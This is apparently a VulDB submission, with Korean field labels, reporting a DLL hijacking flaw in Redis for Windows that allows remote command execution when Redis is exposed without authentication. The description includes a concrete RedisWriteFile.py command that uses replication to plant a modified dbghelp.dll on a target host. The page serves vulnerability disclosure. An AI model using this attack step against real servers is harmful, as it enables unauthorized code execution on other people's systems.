| 제목 | Redis On Windows DLL Hijacking Result in RCE When Unauthorized |
|---|
| 설명 | There is a dll hijacking vulnerability in the Windows version of Redis.
When Redis has unauthorized access or password disclosure, attackers can use dll writing to implement system remote command execution using the Windows version of Redis.
Use RedisWriteFile to write the modified dbghelp.dll to the designated location of the target using master slave replication.
python3 RedisWriteFile.py --rhost=192.168.41.29 --rport=6379 --lhost=192.168.41.38 --rpath="C:/Program Files/Redis/" --rfile="dbghelp.dll" --lfile="dbghelp.dll"
details can be seen on https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| 원천 | ⚠️ https://www.cnblogs.com/J0o1ey/p/16829380.html |
|---|
| 사용자 | J0o1ey (UID 30618) |
|---|
| 제출 | 2022. 10. 26. PM 12:05 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 10. 28. AM 07:39 (2 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 212416 [Redis 켜짐 Windows dbghelp.dll 권한 상승] |
|---|
| 포인트들 | 20 |
|---|